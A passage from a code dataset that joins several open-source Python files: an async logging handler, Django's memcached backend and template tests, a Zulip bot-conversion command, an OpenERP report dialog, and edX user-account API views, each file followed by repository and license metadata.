"""Initialize async logging handler wrapper."""
self.handler = handler
self.loop = loop
self._queue = asyncio.Queue(loop=loop)
self._thread = threading.Thread(target=self._process)
# Delegate from handler
self.setLevel = handler.setLevel
self.setFormatter = handler.setFormatter
self.addFilter = handler.addFilter
self.removeFilter = handler.removeFilter
self.filter = handler.filter
self.flush = handler.flush
self.handle = handler.handle
self.handleError = handler.handleError
self.format = handler.format
self._thread.start()
def close(self):
"""Wrap close to handler."""
self.emit(None)
@asyncio.coroutine
def async_close(self, blocking=False):
"""Close the handler.
When blocking=True, will wait till closed.
"""
yield from self._queue.put(None)
if blocking:
while self._thread.is_alive():
yield from asyncio.sleep(0, loop=self.loop)
def emit(self, record):
"""Process a record."""
ident = self.loop.__dict__.get("_thread_ident")
# inside eventloop
if ident is not None and ident == threading.get_ident():
self._queue.put_nowait(record)
# from a thread/executor
else:
self.loop.call_soon_threadsafe(self._queue.put_nowait, record)
def __repr__(self):
"""String name of this."""
return str(self.handler)
def _process(self):
"""Process log in a thread."""
while True:
record = run_coroutine_threadsafe(
self._queue.get(), self.loop).result()
if record is None:
self.handler.close()
return
self.handler.emit(record)
def createLock(self):
"""Ignore lock stuff."""
pass
def acquire(self):
"""Ignore lock stuff."""
pass
def release(self):
"""Ignore lock stuff."""
pass
@property
def level(self):
"""Wrap property level to handler."""
return self.handler.level
@property
def formatter(self):
"""Wrap property formatter to handler."""
return self.handler.formatter
@property
def name(self):
"""Wrap property set_name to handler."""
return self.handler.get_name()
@name.setter
def set_name(self, name):
"""Wrap property get_name to handler."""
self.handler.name = name
|
apache-2.0
|
extremewaysback/django
|
django/core/cache/backends/memcached.py
|
320
|
6970
|
"Memcached cache backend"
import pickle
import time
from django.core.cache.backends.base import DEFAULT_TIMEOUT, BaseCache
from django.utils import six
from django.utils.encoding import force_str
from django.utils.functional import cached_property
class BaseMemcachedCache(BaseCache):
def __init__(self, server, params, library, value_not_found_exception):
super(BaseMemcachedCache, self).__init__(params)
if isinstance(server, six.string_types):
self._servers = server.split(';')
else:
self._servers = server
# The exception type to catch from the underlying library for a key
# that was not found. This is a ValueError for python-memcache,
# pylibmc.NotFound for pylibmc, and cmemcache will return None without
# raising an exception.
self.LibraryValueNotFoundException = value_not_found_exception
self._lib = library
self._options = params.get('OPTIONS')
@property
def _cache(self):
"""
Implements transparent thread-safe access to a memcached client.
"""
if getattr(self, '_client', None) is None:
self._client = self._lib.Client(self._servers)
return self._client
def get_backend_timeout(self, timeout=DEFAULT_TIMEOUT):
"""
Memcached deals with long (> 30 days) timeouts in a special
way. Call this function to obtain a safe value for your timeout.
"""
if timeout == DEFAULT_TIMEOUT:
timeout = self.default_timeout
if timeout is None:
# Using 0 in memcache sets a non-expiring timeout.
return 0
elif int(timeout) == 0:
# Other cache backends treat 0 as set-and-expire. To achieve this
# in memcache backends, a negative timeout must be passed.
timeout = -1
if timeout > 2592000: # 60*60*24*30, 30 days
# See http://code.google.com/p/memcached/wiki/NewProgramming#Expiration
# "Expiration times can be set from 0, meaning "never expire", to
# 30 days. Any time higher than 30 days is interpreted as a Unix
# timestamp date. If you want to expire an object on January 1st of
# next year, this is how you do that."
#
# This means that we have to switch to absolute timestamps.
timeout += int(time.time())
return int(timeout)
def make_key(self, key, version=None):
# Python 2 memcache requires the key to be a byte string.
return force_str(super(BaseMemcachedCache, self).make_key(key, version))
def add(self, key, value, timeout=DEFAULT_TIMEOUT, version=None):
key = self.make_key(key, version=version)
return self._cache.add(key, value, self.get_backend_timeout(timeout))
def get(self, key, default=None, version=None):
key = self.make_key(key, version=version)
val = self._cache.get(key)
if val is None:
return default
return val
def set(self, key, value, timeout=DEFAULT_TIMEOUT, version=None):
key = self.make_key(key, version=version)
if not self._cache.set(key, value, self.get_backend_timeout(timeout)):
# make sure the key doesn't keep its old value in case of failure to set (memcached's 1MB limit)
self._cache.delete(key)
def delete(self, key, version=None):
key = self.make_key(key, version=version)
self._cache.delete(key)
def get_many(self, keys, version=None):
new_keys = [self.make_key(x, version=version) for x in keys]
ret = self._cache.get_multi(new_keys)
if ret:
_ = {}
m = dict(zip(new_keys, keys))
for k, v in ret.items():
_[m[k]] = v
ret = _
return ret
def close(self, **kwargs):
self._cache.disconnect_all()
def incr(self, key, delta=1, version=None):
key = self.make_key(key, version=version)
# memcached doesn't support a negative delta
if delta < 0:
return self._cache.decr(key, -delta)
try:
val = self._cache.incr(key, delta)
# python-memcache responds to incr on non-existent keys by
# raising a ValueError, pylibmc by raising a pylibmc.NotFound
# and Cmemcache returns None. In all cases,
# we should raise a ValueError though.
except self.LibraryValueNotFoundException:
val = None
if val is None:
raise ValueError("Key '%s' not found" % key)
return val
def decr(self, key, delta=1, version=None):
key = self.make_key(key, version=version)
# memcached doesn't support a negative delta
if delta < 0:
return self._cache.incr(key, -delta)
try:
val = self._cache.decr(key, delta)
# python-memcache responds to incr on non-existent keys by
# raising a ValueError, pylibmc by raising a pylibmc.NotFound
# and Cmemcache returns None. In all cases,
# we should raise a ValueError though.
except self.LibraryValueNotFoundException:
val = None
if val is None:
raise ValueError("Key '%s' not found" % key)
return val
def set_many(self, data, timeout=DEFAULT_TIMEOUT, version=None):
safe_data = {}
for key, value in data.items():
key = self.make_key(key, version=version)
safe_data[key] = value
self._cache.set_multi(safe_data, self.get_backend_timeout(timeout))
def delete_many(self, keys, version=None):
l = lambda x: self.make_key(x, version=version)
self._cache.delete_multi(map(l, keys))
def clear(self):
self._cache.flush_all()
class MemcachedCache(BaseMemcachedCache):
"An implementation of a cache binding using python-memcached"
def __init__(self, server, params):
import memcache
super(MemcachedCache, self).__init__(server, params,
library=memcache,
value_not_found_exception=ValueError)
@property
def _cache(self):
if getattr(self, '_client', None) is None:
self._client = self._lib.Client(self._servers, pickleProtocol=pickle.HIGHEST_PROTOCOL)
return self._client
class PyLibMCCache(BaseMemcachedCache):
"An implementation of a cache binding using pylibmc"
def __init__(self, server, params):
import pylibmc
super(PyLibMCCache, self).__init__(server, params,
library=pylibmc,
value_not_found_exception=pylibmc.NotFound)
@cached_property
def _cache(self):
client = self._lib.Client(self._servers)
if self._options:
client.behaviors = self._options
return client
|
bsd-3-clause
|
mahim97/zulip
|
zerver/management/commands/convert_bot_to_outgoing_webhook.py
|
3
|
2259
|
from argparse import ArgumentParser
from typing import Any
from zerver.lib.management import ZulipBaseCommand
from zerver.models import Service, UserProfile
class Command(ZulipBaseCommand):
help = """Given an existing bot, converts it into an outgoing webhook bot."""
def add_arguments(self, parser: ArgumentParser) -> None:
self.add_realm_args(parser)
parser.add_argument('bot_email', metavar='<bot_email>', type=str,
help='email of bot')
parser.add_argument('service_name', metavar='<service_name>', type=str,
help='name of Service object to create')
parser.add_argument('base_url', metavar='<base_url>', type=str,
help='base url of outgoing webhook')
# TODO: Add token and interface as arguments once OutgoingWebhookWorker
# uses these fields on the Service object.
def handle(self, *args: Any, **options: str) -> None:
bot_email = options['bot_email']
service_name = options['service_name']
base_url = options['base_url']
realm = self.get_realm(options)
if not bot_email:
print('Email of existing bot must be provided')
exit(1)
if not service_name:
print('Name for Service object must be provided')
exit(1)
if not base_url:
print('Base URL of outgoing webhook must be provided')
exit(1)
# TODO: Normalize email?
bot_profile = self.get_user(email=bot_email, realm=realm)
if not bot_profile.is_bot:
print('User %s is not a bot' % (bot_email,))
exit(1)
if bot_profile.is_outgoing_webhook_bot:
print('%s is already marked as an outgoing webhook bot' % (bot_email,))
exit(1)
Service.objects.create(name=service_name,
user_profile=bot_profile,
base_url=base_url,
token='',
interface=1)
bot_profile.bot_type = UserProfile.OUTGOING_WEBHOOK_BOT
bot_profile.save()
print('Successfully converted %s into an outgoing webhook bot' % (bot_email,))
|
apache-2.0
|
Elbagoury/odoo
|
addons/base_report_designer/plugin/openerp_report_designer/bin/script/NewReport.py
|
384
|
3903
|
#########################################################################
#
# Copyright (c) 2003-2004 Danny Brewer [email protected]
# Copyright (C) 2004-2010 OpenERP SA (<http://openerp.com>).
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# See: http://www.gnu.org/licenses/lgpl.html
#
#############################################################################
import uno
import string
import unohelper
import xmlrpclib
from com.sun.star.task import XJobExecutor
if __name__<>"package":
from lib.gui import *
from lib.error import ErrorDialog
from lib.functions import *
from lib.logreport import *
from LoginTest import *
from lib.rpc import *
database="test"
uid = 3
#
#
#
# Start OpenOffice.org, listen for connections and open testing document
#
#
class NewReport(unohelper.Base, XJobExecutor):
def __init__(self, ctx):
self.ctx = ctx
self.module = "openerp_report"
self.version = "0.1"
LoginTest()
self.logobj=Logger()
if not loginstatus and __name__=="package":
exit(1)
self.win=DBModalDialog(60, 50, 180, 115, "Open New Report")
self.win.addFixedText("lblModuleSelection", 2, 2, 60, 15, "Module Selection")
self.win.addComboListBox("lstModule", -2,13,176,80 , False)
self.lstModule = self.win.getControl( "lstModule" )
self.aModuleName=[]
desktop=getDesktop()
doc = desktop.getCurrentComponent()
docinfo=doc.getDocumentInfo()
global passwd
self.password = passwd
global url
self.sock=RPCSession(url)
ids = self.sock.execute(database, uid, self.password, 'ir.model' , 'search',[])
fields = [ 'model','name']
res = self.sock.execute(database, uid, self.password, 'ir.model' , 'read', ids, fields)
res.sort(lambda x, y: cmp(x['name'],y['name']))
for i in range(len(res)):
self.lstModule.addItem(res[i]['name'],self.lstModule.getItemCount())
self.aModuleName.append(res[i]['model'])
self.win.addButton('btnOK',-2 ,-5, 70,15,'Use Module in Report' ,actionListenerProc = self.btnOk_clicked )
self.win.addButton('btnCancel',-2 - 70 - 5 ,-5, 35,15,'Cancel' ,actionListenerProc = self.btnCancel_clicked )
self.win.doModalDialog("",None)
def btnOk_clicked(self, oActionEvent):
desktop=getDesktop()
doc = desktop.getCurrentComponent()
docinfo=doc.getDocumentInfo()
docinfo.setUserFieldValue(3,self.aModuleName[self.lstModule.getSelectedItemPos()])
self.logobj.log_write('Module Name',LOG_INFO, ':Module use in creating a report %s using database %s' % (self.aModuleName[self.lstModule.getSelectedItemPos()], database))
self.win.endExecute()
def btnCancel_clicked(self, oActionEvent):
self.win.endExecute()
if __name__<>"package" and __name__=="__main__":
NewReport(None)
elif __name__=="package":
g_ImplementationHelper.addImplementation( \
NewReport,
"org.openoffice.openerp.report.opennewreport",
("com.sun.star.task.Job",),)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
cainmatt/django
|
tests/template_backends/test_utils.py
|
351
|
1521
|
from django.core.exceptions import ImproperlyConfigured
from django.template import engines
from django.test import SimpleTestCase, override_settings
class TemplateStringsTests(SimpleTestCase):
@override_settings(TEMPLATES=[{
'BACKEND': 'raise.import.error',
}])
def test_backend_import_error(self):
"""
Failing to import a backend keeps raising the original import error.
Regression test for #24265.
"""
with self.assertRaises(ImportError):
engines.all()
with self.assertRaises(ImportError):
engines.all()
@override_settings(TEMPLATES=[{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
# Incorrect: APP_DIRS and loaders are mutually incompatible.
'APP_DIRS': True,
'OPTIONS': {'loaders': []},
}])
def test_backend_improperly_configured(self):
"""
Failing to initialize a backend keeps raising the original exception.
Regression test for #24265.
"""
with self.assertRaises(ImproperlyConfigured):
engines.all()
with self.assertRaises(ImproperlyConfigured):
engines.all()
@override_settings(TEMPLATES=[{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
}, {
'BACKEND': 'django.template.backends.django.DjangoTemplates',
}])
def test_backend_names_must_be_unique(self):
with self.assertRaises(ImproperlyConfigured):
engines.all()
|
bsd-3-clause
|
motion2015/edx-platform
|
openedx/core/djangoapps/user_api/views.py
|
31
|
32766
|
"""HTTP end-points for the User API. """
import copy
from opaque_keys import InvalidKeyError
from django.conf import settings
from django.contrib.auth.models import User
from django.http import HttpResponse
from django.core.urlresolvers import reverse
from django.core.exceptions import ImproperlyConfigured, NON_FIELD_ERRORS, ValidationError
from django.utils.translation import ugettext as _
from django.utils.decorators import method_decorator
from django.views.decorators.csrf import ensure_csrf_cookie, csrf_protect, csrf_exempt
from opaque_keys.edx import locator
from rest_framework import authentication
from rest_framework import filters
from rest_framework import generics
from rest_framework import status
from rest_framework import viewsets
from rest_framework.views import APIView
from rest_framework.exceptions import ParseError
from django_countries import countries
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from openedx.core.lib.api.permissions import ApiKeyHeaderPermission
import third_party_auth
from django_comment_common.models import Role
from edxmako.shortcuts import marketing_link
from student.views import create_account_with_params
from student.cookies import set_logged_in_cookies
from openedx.core.lib.api.authentication import SessionAuthenticationAllowInactiveUser
from util.json_request import JsonResponse
from .preferences.api import update_email_opt_in
from .helpers import FormDescription, shim_student_view, require_post_params
from .models import UserPreference, UserProfile
from .accounts import (
NAME_MAX_LENGTH, EMAIL_MIN_LENGTH, EMAIL_MAX_LENGTH, PASSWORD_MIN_LENGTH, PASSWORD_MAX_LENGTH,
USERNAME_MIN_LENGTH, USERNAME_MAX_LENGTH
)
from .accounts.api import check_account_exists
from .serializers import UserSerializer, UserPreferenceSerializer
class LoginSessionView(APIView):
"""HTTP end-points for logging in users. """
# This end-point is available to anonymous users,
# so do not require authentication.
authentication_classes = []
@method_decorator(ensure_csrf_cookie)
def get(self, request): # pylint: disable=unused-argument
"""Return a description of the login form.
This decouples clients from the API definition:
if the API decides to modify the form, clients won't need
to be updated.
See `user_api.helpers.FormDescription` for examples
of the JSON-encoded form description.
Returns:
HttpResponse
"""
form_desc = FormDescription("post", reverse("user_api_login_session"))
# Translators: This label appears above a field on the login form
# meant to hold the user's email address.
email_label = _(u"Email")
# Translators: This example email address is used as a placeholder in
# a field on the login form meant to hold the user's email address.
email_placeholder = _(u"[email protected]")
# Translators: These instructions appear on the login form, immediately
# below a field meant to hold the user's email address.
email_instructions = _(
u"The email address you used to register with {platform_name}"
).format(platform_name=settings.PLATFORM_NAME)
form_desc.add_field(
"email",
field_type="email",
label=email_label,
placeholder=email_placeholder,
instructions=email_instructions,
restrictions={
"min_length": EMAIL_MIN_LENGTH,
"max_length": EMAIL_MAX_LENGTH,
}
)
# Translators: This label appears above a field on the login form
# meant to hold the user's password.
password_label = _(u"Password")
form_desc.add_field(
"password",
label=password_label,
field_type="password",
restrictions={
"min_length": PASSWORD_MIN_LENGTH,
"max_length": PASSWORD_MAX_LENGTH,
}
)
form_desc.add_field(
"remember",
field_type="checkbox",
label=_("Remember me"),
default=False,
required=False,
)
return HttpResponse(form_desc.to_json(), content_type="application/json")
@method_decorator(require_post_params(["email", "password"]))
@method_decorator(csrf_protect)
def post(self, request):
"""Log in a user.
You must send all required form fields with the request.
You can optionally send an `analytics` param with a JSON-encoded
object with additional info to include in the login analytics event.
Currently, the only supported field is "enroll_course_id" to indicate
that the user logged in while enrolling in a particular course.
Arguments:
request (HttpRequest)
Returns:
HttpResponse: 200 on success
HttpResponse: 400 if the request is not valid.
HttpResponse: 403 if authentication failed.
403 with content "third-party-auth" if the user
has successfully authenticated with a third party provider
but does not have a linked account.
HttpResponse: 302 if redirecting to another page.
Example Usage:
POST /user_api/v1/login_session
with POST params `email`, `password`, and `remember`.
200 OK
"""
# For the initial implementation, shim the existing login view
# from the student Django app.
from student.views import login_user
return shim_student_view(login_user, check_logged_in=True)(request)
class RegistrationView(APIView):
"""HTTP end-points for creating a new user. """
DEFAULT_FIELDS = ["email", "name", "username", "password"]
EXTRA_FIELDS = [
"city",
"country",
"gender",
"year_of_birth",
"level_of_education",
"mailing_address",
"goals",
"honor_code",
"terms_of_service",
]
# This end-point is available to anonymous users,
# so do not require authentication.
authentication_classes = []
def _is_field_visible(self, field_name):
"""Check whether a field is visible based on Django settings. """
return self._extra_fields_setting.get(field_name) in ["required", "optional"]
def _is_field_required(self, field_name):
"""Check whether a field is required based on Django settings. """
return self._extra_fields_setting.get(field_name) == "required"
def __init__(self, *args, **kwargs):
super(RegistrationView, self).__init__(*args, **kwargs)
# Backwards compatibility: Honor code is required by default, unless
# explicitly set to "optional" in Django settings.
self._extra_fields_setting = copy.deepcopy(settings.REGISTRATION_EXTRA_FIELDS)
self._extra_fields_setting["honor_code"] = self._extra_fields_setting.get("honor_code", "required")
# Check that the setting is configured correctly
for field_name in self.EXTRA_FIELDS:
if self._extra_fields_setting.get(field_name, "hidden") not in ["required", "optional", "hidden"]:
msg = u"Setting REGISTRATION_EXTRA_FIELDS values must be either required, optional, or hidden."
raise ImproperlyConfigured(msg)
# Map field names to the instance method used to add the field to the form
self.field_handlers = {}
for field_name in self.DEFAULT_FIELDS + self.EXTRA_FIELDS:
handler = getattr(self, "_add_{field_name}_field".format(field_name=field_name))
self.field_handlers[field_name] = handler
@method_decorator(ensure_csrf_cookie)
def get(self, request):
"""Return a description of the registration form.
This decouples clients from the API definition:
if the API decides to modify the form, clients won't need
to be updated.
This is especially important for the registration form,
since different edx-platform installations might
collect different demographic information.
See `user_api.helpers.FormDescription` for examples
of the JSON-encoded form description.
Arguments:
request (HttpRequest)
Returns:
HttpResponse
"""
form_desc = FormDescription("post", reverse("user_api_registration"))
self._apply_third_party_auth_overrides(request, form_desc)
# Default fields are always required
for field_name in self.DEFAULT_FIELDS:
self.field_handlers[field_name](form_desc, required=True)
# Extra fields configured in Django settings
# may be required, optional, or hidden
for field_name in self.EXTRA_FIELDS:
if self._is_field_visible(field_name):
self.field_handlers[field_name](
form_desc,
required=self._is_field_required(field_name)
)
return HttpResponse(form_desc.to_json(), content_type="application/json")
@method_decorator(csrf_exempt)
def post(self, request):
"""Create the user's account.
You must send all required form fields with the request.
You can optionally send a "course_id" param to indicate in analytics
events that the user registered while enrolling in a particular course.
Arguments:
request (HTTPRequest)
Returns:
HttpResponse: 200 on success
HttpResponse: 400 if the request is not valid.
HttpResponse: 409 if an account with the given username or email
address already exists
"""
data = request.POST.copy()
email = data.get('email')
username = data.get('username')
# Handle duplicate email/username
conflicts = check_account_exists(email=email, username=username)
if conflicts:
conflict_messages = {
# Translators: This message is shown to users who attempt to create a new
# account using an email address associated with an existing account.
"email": _(
u"It looks like {email_address} belongs to an existing account. Try again with a different email address."
).format(email_address=email),
# Translators: This message is shown to users who attempt to create a new
# account using a username associated with an existing account.
"username": _(
u"It looks like {username} belongs to an existing account. Try again with a different username."
).format(username=username),
}
errors = {
field: [{"user_message": conflict_messages[field]}]
for field in conflicts
}
return JsonResponse(errors, status=409)
# Backwards compatibility: the student view expects both
# terms of service and honor code values. Since we're combining
# these into a single checkbox, the only value we may get
# from the new view is "honor_code".
# Longer term, we will need to make this more flexible to support
# open source installations that may have separate checkboxes
# for TOS, privacy policy, etc.
if data.get("honor_code") and "terms_of_service" not in data:
data["terms_of_service"] = data["honor_code"]
try:
user = create_account_with_params(request, data)
except ValidationError as err:
# Should only get non-field errors from this function
assert NON_FIELD_ERRORS not in err.message_dict
# Only return first error for each field
errors = {
field: [{"user_message": error} for error in error_list]
for field, error_list in err.message_dict.items()
}
return JsonResponse(errors, status=400)
response = JsonResponse({"success": True})
set_logged_in_cookies(request, response, user)
return response
def _add_email_field(self, form_desc, required=True):
"""Add an email field to a form description.
Arguments:
form_desc: A form description
Keyword Arguments:
required (bool): Whether this field is required; defaults to True
"""
# Translators: This label appears above a field on the registration form
# meant to hold the user's email address.
email_label = _(u"Email")
# Translators: This example email address is used as a placeholder in
# a field on the registration form meant to hold the user's email address.
email_placeholder = _(u"[email protected]")
form_desc.add_field(
"email",
field_type="email",
label=email_label,
placeholder=email_placeholder,
restrictions={
"min_length": EMAIL_MIN_LENGTH,
"max_length": EMAIL_MAX_LENGTH,
},
required=required
)
def _add_name_field(self, form_desc, required=True):
"""Add a name field to a form description.
Arguments:
form_desc: A form description
Keyword Arguments:
required (bool): Whether this field is required; defaults to True
"""
# Translators: This label appears above a field on the registration form
# meant to hold the user's full name.
name_label = _(u"Full name")
# Translators: This example name is used as a placeholder in
# a field on the registration form meant to hold the user's name.
name_placeholder = _(u"Jane Doe")
# Translators: These instructions appear on the registration form, immediately
# below a field meant to hold the user's full name.
name_instructions = _(u"Needed for any certificates you may earn")
form_desc.add_field(
"name",
label=name_label,
placeholder=name_placeholder,
instructions=name_instructions,
restrictions={
"max_length": NAME_MAX_LENGTH,
},
required=required
)
def _add_username_field(self, form_desc, required=True):
"""Add a username field to a form description.
Arguments:
form_desc: A form description
Keyword Arguments:
required (bool): Whether this field is required; defaults to True
"""
# Translators: This label appears above a field on the registration form
# meant to hold the user's public username.
username_label = _(u"Public username")
# Translators: These instructions appear on the registration form, immediately
# below a field meant to hold the user's public username.
username_instructions = _(
u"The name that will identify you in your courses - "
"{bold_start}(cannot be changed later){bold_end}"
).format(bold_start=u'<strong>', bold_end=u'</strong>')
# Translators: This example username is used as a placeholder in
# a field on the registration form meant to hold the user's username.
username_placeholder = _(u"JaneDoe")
form_desc.add_field(
"username",
label=username_label,
instructions=username_instructions,
placeholder=username_placeholder,
restrictions={
"min_length": USERNAME_MIN_LENGTH,
"max_length": USERNAME_MAX_LENGTH,
},
required=required
)
def _add_password_field(self, form_desc, required=True):
"""Add a password field to a form description.
Arguments:
form_desc: A form description
Keyword Arguments:
required (bool): Whether this field is required; defaults to True
"""
# Translators: This label appears above a field on the registration form
# meant to hold the user's password.
password_label = _(u"Password")
form_desc.add_field(
"password",
label=password_label,
field_type="password",
restrictions={
"min_length": PASSWORD_MIN_LENGTH,
"max_length": PASSWORD_MAX_LENGTH,
},
required=required
)
def _add_level_of_education_field(self, form_desc, required=True):
"""Add a level of education field to a form description.
Arguments:
form_desc: A form description
Keyword Arguments:
required (bool): Whether this field is required; defaults to True
"""
# Translators: This label appears above a dropdown menu on the registration
# form used to select the user's highest completed level of education.
education_level_label = _(u"Highest level of education completed")
form_desc.add_field(
"level_of_education",
label=education_level_label,
field_type="select",
options=UserProfile.LEVEL_OF_EDUCATION_CHOICES,
include_default_option=True,
required=required
)
def _add_gender_field(self, form_desc, required=True):
"""Add a gender field to a form description.
Arguments:
form_desc: A form description
Keyword Arguments:
required (bool): Whether this field is required; defaults to True
"""
# Translators: This label appears above a dropdown menu on the registration
# form used to select the user's gender.
gender_label = _(u"Gender")
form_desc.add_field(
"gender",
label=gender_label,
field_type="select",
options=UserProfile.GENDER_CHOICES,
include_default_option=True,
required=required
)
def _add_year_of_birth_field(self, form_desc, required=True):
"""Add a year of birth field to a form description.
Arguments:
form_desc: A form description
Keyword Arguments:
required (bool): Whether this field is required; defaults to True
"""
# Translators: This label appears above a dropdown menu on the registration
# form used to select the user's year of birth.
yob_label = _(u"Year of birth")
options = [(unicode(year), unicode(year)) for year in UserProfile.VALID_YEARS]
form_desc.add_field(
"year_of_birth",
label=yob_label,
field_type="select",
options=options,
include_default_option=True,
required=required
)
def _add_mailing_address_field(self, form_desc, required=True):
"""Add a mailing address field to a form description.
Arguments:
form_desc: A form description
Keyword Arguments:
required (bool): Whether this field is required; defaults to True
"""
# Translators: This label appears above a field on the registration form
# meant to hold the user's mailing address.
mailing_address_label = _(u"Mailing address")
form_desc.add_field(
"mailing_address",
label=mailing_address_label,
field_type="textarea",
required=required
)
def _add_goals_field(self, form_desc, required=True):
"""Add a goals field to a form description.
Arguments:
form_desc: A form description
Keyword Arguments:
required (bool): Whether this field is required; defaults to True
"""
# Translators: This phrase appears above a field on the registration form
# meant to hold the user's reasons for registering with edX.
goals_label = _(
u"Tell us why you're interested in {platform_name}"
).format(platform_name=settings.PLATFORM_NAME)
form_desc.add_field(
"goals",
label=goals_label,
field_type="textarea",
required=required
)
def _add_city_field(self, form_desc, required=True):
"""Add a city field to a form description.
Arguments:
form_desc: A form description
Keyword Arguments:
required (bool): Whether this field is required; defaults to True
"""
# Translators: This label appears above a field on the registration form
# which allows the user to input the city in which they live.
city_label = _(u"City")
form_desc.add_field(
"city",
label=city_label,
required=required
)
def _add_country_field(self, form_desc, required=True):
"""Add a country field to a form description.
Arguments:
form_desc: A form description
Keyword Arguments:
required (bool): Whether this field is required; defaults to True
"""
# Translators: This label appears above a dropdown menu on the registration
# form used to select the country in which the user lives.
country_label = _(u"Country")
error_msg = _(u"Please select your Country.")
form_desc.add_field(
"country",
label=country_label,
field_type="select",
options=list(countries),
include_default_option=True,
required=required,
error_messages={
"required": error_msg
}
)
def _add_honor_code_field(self, form_desc, required=True):
"""Add an honor code field to a form description.
Arguments:
form_desc: A form description
Keyword Arguments:
required (bool): Whether this field is required; defaults to True
"""
# Separate terms of service and honor code checkboxes
if self._is_field_visible("terms_of_service"):
terms_text = _(u"Honor Code")
# Combine terms of service and honor code checkboxes
else:
# Translators: This is a legal document users must agree to
# in order to register a new account.
terms_text = _(u"Terms of Service and Honor Code")
terms_link = u"<a href=\"{url}\">{terms_text}</a>".format(
url=marketing_link("HONOR"),
terms_text=terms_text
)
# Translators: "Terms of Service" is a legal document users must agree to
# in order to register a new account.
label = _(
u"I agree to the {platform_name} {terms_of_service}."
).format(
platform_name=settings.PLATFORM_NAME,
terms_of_service=terms_link
)
# Translators: "Terms of Service" is a legal document users must agree to
# in order to register a new account.
error_msg = _(
u"You must agree to the {platform_name} {terms_of_service}."
).format(
platform_name=settings.PLATFORM_NAME,
terms_of_service=terms_link
)
form_desc.add_field(
"honor_code",
label=label,
field_type="checkbox",
default=False,
required=required,
error_messages={
"required": error_msg
}
)
def _add_terms_of_service_field(self, form_desc, required=True):
"""Add a terms of service field to a form description.
Arguments:
form_desc: A form description
Keyword Arguments:
required (bool): Whether this field is required; defaults to True
"""
# Translators: This is a legal document users must agree to
# in order to register a new account.
terms_text = _(u"Terms of Service")
terms_link = u"<a href=\"{url}\">{terms_text}</a>".format(
url=marketing_link("TOS"),
terms_text=terms_text
)
# Translators: "Terms of service" is a legal document users must agree to
# in order to register a new account.
label = _(
u"I agree to the {platform_name} {terms_of_service}."
).format(
platform_name=settings.PLATFORM_NAME,
terms_of_service=terms_link
)
# Translators: "Terms of service" is a legal document users must agree to
# in order to register a new account.
error_msg = _(
u"You must agree to the {platform_name} {terms_of_service}."
).format(
platform_name=settings.PLATFORM_NAME,
terms_of_service=terms_link
)
form_desc.add_field(
"terms_of_service",
label=label,
field_type="checkbox",
default=False,
required=required,
error_messages={
"required": error_msg
}
)
def _apply_third_party_auth_overrides(self, request, form_desc):
"""Modify the registration form if the user has authenticated with a third-party provider.
If a user has successfully authenticated with a third-party provider,
but does not yet have an account with EdX, we want to fill in
the registration form with any info that we get from the
provider.
This will also hide the password field, since we assign users a default
(random) password on the assumption that they will be using
third-party auth to log in.
Arguments:
request (HttpRequest): The request for the registration form, used
to determine if the user has successfully authenticated
with a third-party provider.
form_desc (FormDescription): The registration form description
"""
if third_party_auth.is_enabled():
running_pipeline = third_party_auth.pipeline.get(request)
if running_pipeline:
current_provider = third_party_auth.provider.Registry.get_from_pipeline(running_pipeline)
# Override username / email / full name
field_overrides = current_provider.get_register_form_data(
running_pipeline.get('kwargs')
)
for field_name in self.DEFAULT_FIELDS:
if field_name in field_overrides:
form_desc.override_field_properties(
field_name, default=field_overrides[field_name]
)
# Hide the password field
form_desc.override_field_properties(
"password",
default="",
field_type="hidden",
required=False,
label="",
instructions="",
restrictions={}
)
class PasswordResetView(APIView):
"""HTTP end-point for GETting a description of the password reset form. """
# This end-point is available to anonymous users,
# so do not require authentication.
authentication_classes = []
@method_decorator(ensure_csrf_cookie)
def get(self, request): # pylint: disable=unused-argument
"""Return a description of the password reset form.
This decouples clients from the API definition:
if the API decides to modify the form, clients won't need
to be updated.
See `user_api.helpers.FormDescription` for examples
of the JSON-encoded form description.
Returns:
HttpResponse
"""
form_desc = FormDescription("post", reverse("password_change_request"))
# Translators: This label appears above a field on the password reset
# form meant to hold the user's email address.
email_label = _(u"Email")
# Translators: This example email address is used as a placeholder in
# a field on the password reset form meant to hold the user's email address.
email_placeholder = _(u"[email protected]")
# Translators: These instructions appear on the password reset form,
# immediately below a field meant to hold the user's email address.
email_instructions = _(
u"The email address you used to register with {platform_name}"
).format(platform_name=settings.PLATFORM_NAME)
form_desc.add_field(
"email",
field_type="email",
label=email_label,
placeholder=email_placeholder,
instructions=email_instructions,
restrictions={
"min_length": EMAIL_MIN_LENGTH,
"max_length": EMAIL_MAX_LENGTH,
}
)
return HttpResponse(form_desc.to_json(), content_type="application/json")
class UserViewSet(viewsets.ReadOnlyModelViewSet):
authentication_classes = (authentication.SessionAuthentication,)
permission_classes = (ApiKeyHeaderPermission,)
queryset = User.objects.all().prefetch_related("preferences")
serializer_class = UserSerializer
paginate_by = 10
paginate_by_param = "page_size"
class ForumRoleUsersListView(generics.ListAPIView):
"""
Forum roles are represented by a list of user dicts
"""
authentication_classes = (authentication.SessionAuthentication,)
permission_classes = (ApiKeyHeaderPermission,)
serializer_class = UserSerializer
paginate_by = 10
paginate_by_param = "page_size"
def get_queryset(self):
"""
Return a list of users with the specified role/course pair
"""
name = self.kwargs['name']
course_id_string = self.request.QUERY_PARAMS.get('course_id')
if not course_id_string:
raise ParseError('course_id must be specified')
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id_string)
role = Role.objects.get_or_create(course_id=course_id, name=name)[0]
users = role.users.all()
return users
class UserPreferenceViewSet(viewsets.ReadOnlyModelViewSet):
authentication_classes = (authentication.SessionAuthentication,)
permission_classes = (ApiKeyHeaderPermission,)
queryset = UserPreference.objects.all()
filter_backends = (filters.DjangoFilterBackend,)
